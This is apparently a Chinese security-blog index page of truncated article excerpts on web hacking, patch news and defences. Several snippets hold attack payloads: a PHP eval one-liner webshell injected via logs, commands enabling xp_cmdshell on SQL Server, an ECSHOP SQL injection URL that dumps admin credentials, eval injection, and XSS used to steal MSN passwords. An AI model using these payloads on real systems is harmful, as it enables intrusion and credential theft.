事发一星期前,在入侵一个PHPWIND论坛时的成果,适用于PHPWIND不能上传,而网上盛传的三种拿SEHLL方法都无效,可以一试,应该算是PHPWIND后台的漏洞准备工具:winsock专家v0.6betan1一只;UE-32.EXE一只；NC.EXE一只,电脑一台(只见一堆砖头飞过。。。。)开工了，首先打开wins...

[阅读全文]

这是一个很好的思路，我们可以随意构造.php">http://www.exp.com/index<?/**/eval($_POST[cmd]);/**/?>.php这样的GET请求，将一句话木马写入web日志，然后利用文件包含漏洞包含日志得到WEBSHELL，如milw0rm上的这个EXP：http://www.mil...

[阅读全文]

如果不删除sql危险存储,可以按下面的方法执行系统命令sqlserver2005下开启xp_cmdshell的办法EXECsp_configure'showadvancedoptions',1;RECONFIGURE;EXECsp_configure'xp_cmdshell',1;RECONFIGURE;SQL2005...

[阅读全文]

先看这一段简单的代码<?phpsession_start();$_SESSION['isadmin']='yes';$isadmin='no';echo$_SESSION['isadmin'];?>当php.ini里配置register_globals=Off时，没任何问题，输出yes但是当php.ini里配置regi...

[阅读全文]

ECSHOPv2.5.0存在注入点，可直接爆出后台管理员ID,PASSWORD,EMAIL利用代码user.php?act=order_query&order_sn='unionselect1,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8fromecs_a...

[阅读全文]

byRyat[puretot]mail:puretotatgmaildotcomteam:http://www.80vul.comdate:2008-12-18一分析:这个漏洞出在后台:(wp-admin/post.php复制内容到剪贴板代码:if(current_user_can('edit_post',$post_...

[阅读全文]

$REQUEST_URI=$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];$wind_version='7.0';$wind_repair='';从外面任何QUERY_STRING没做过滤导致漏洞==看到官方最近更新版本就来看一下源始码发现满多漏洞的先发一个后台xss...

[阅读全文]

ActiveX-ActiveExploitation01/2008warlordwarlord@nologin.orghttp://www.nologin.orgSharewhatIknow,learnwhatIdon't1)ForewordFirstofall,I'dliketoexplainwhatthispape...

[阅读全文]

来源：phpeval'sBLOG作者：phpevaldigg/digg_add.phpXML/HTML代码

[阅读全文]

来源：phpeval'sBLOG作者：phpeval前段时间一个程序出的问题。就和这差不多。<?php$code="${${eval($_GET[c])}}";?>对于上面的代码。如果在URL提交http://www.phpeval.cn/test.php?c=phpinfo();就可以发现phpinfo()被执行了。...

[阅读全文]

来源：phpeval'sBLOG作者：phpeval昨天一个朋友扔我了一个cgi程序。叫我想办法拿一个SHELL。CGI的程序我可是从来没看过。遇到这种对于我来说全新的东西。真的是有点没办法。不过扔来了。就当学习。我硬着头皮看。下面把我学习CGI程序的代码。以及漏洞发现的过程。进行记录一下：打开该CGI程序。发现根目录...

[阅读全文]

微软因发布Windows系统漏洞修复补丁而“闻名于世”。每个月第二个星期二，微软都会发布相关的安全补丁，人们也称这天为“星期二补丁日”。　　不过，当出现安全漏洞大面积扩散的紧急情况，微软会临时调整补丁发布日期。上周三，因为爆出影响所有版本IE的重大安全漏洞，微软便提前发布...

[阅读全文]

ThefollowingproofofconceptdemonstratesaXSSvirus.ThevulnerableenvironmentcreatedisanexamplescenariorequiredforXSSvirusesanddoesnotshowanexhaustivesetofpossibleco...

[阅读全文]

作者：xi4oyu[test@localhosttmp]$ls-ltotal488-rwxr-xr-x1rootroot494816Oct407:08ptyshell-static[test@localhosttmp]$md5sumptyshell-static3ea2a909f736660097c0248d403bb...

[阅读全文]

今天群里一新面孔问WEBEDIT后台如何抓webshell,我叫他百度一下,说这是老东西了应该文章不少.他说没找到叫我告诉他,汗之,简单爬几笔吧-Amxking通常在GOOGLE或者利用挖掘鸡搜索关键词eWebEditor或/ewebeditor/db/ewebeditor.mdb就可以找到很多使用eWebEditor...

[阅读全文]

pop：这个方法很巧，但也不是全部都行，因为有些的已经修改admin_login.asp的名称，针对修改路径是很有效的，也可以说是利用了管理员对css的疏忽漏洞文件：region.asp1、打开某动易核心的网站，在域名后加region.asp访问，如http://www.xxxx.gov.cn/region.asp便会...

[阅读全文]

微软今天发布了一个预告，表示将在当地时间12月17日发布IE70day漏洞的补丁，本次补丁属于微软的非常规性突发漏洞补丁，文件名为“KB961051”。　　之前微软也发布了安全通报，介绍暂时屏蔽IE0day漏洞方法。　　　微软IE70day漏洞是一个基于IE7浏览器内核的漏洞，所有基于IE7内核...

[阅读全文]

XSS无处不在，我也举例一下。国内知名WEBIM的一个XSS例子：客户端向服务端发送消息，存在漏洞的函数如下：functionsave_message(msg){1400varm=msg;1401for(vareinemots){1402if(m.indexOf(e)!=-1){1403m=m.replace(e,em...

[阅读全文]

ie7这个问题出在mshtml.dll，而大家如果有印象的话，之前word是出过一个javascript执行的问题，当时大家的思路都是执行js，但是用js想在word里隐蔽地调用一个html可能有点难度（好像是无法iframe什么的），其实可以直接指定那个url为某个html的url地址。代码如下<html><OBJE...

[阅读全文]

听到同事说“朋友msn发来一个网页，自己输入了密码，结果过了几天后，MSN密码错误，可能是被盗了。”当时还问同事要地址，他却说找不到地址了。几天后朋友说看到幻影发出了msn跨站代码，于是自己下载exp研究半天，终于利用成功。　　原代码很乱，排版后如下：　　1<fontcolor=”f...

[阅读全文]

公布"国内邮箱系统爆发大规模跨站漏洞"后，FireF0X就和我说，什么时候弄个XSS的主题写写，让大家也一起讨论一下。说来惭愧，也一直没写什么东西，这次在"火狐"公布"Kaixin001.comXSS漏洞"，也算是给他有个交代吧。开心网是一个在线社区，通过它您可以与朋友、同学、同事、家人保持更紧密的联系，及时了解他们的...

[阅读全文]

自从whois技术公布以后，旁注攻击已经成为黑客十分常用的一个攻击手段。防范旁注攻击，除了配置好目录权限外，我们其实还可以在whois查询时就将黑客堵住。我们先来分析一下whois查询的原理，我们现在使用的DNS域名其实都是需要统一向总部位于美国的国际域名组织进行注册的，而国际域名组织为了方便管理等原因，将域名的信息放...

[阅读全文]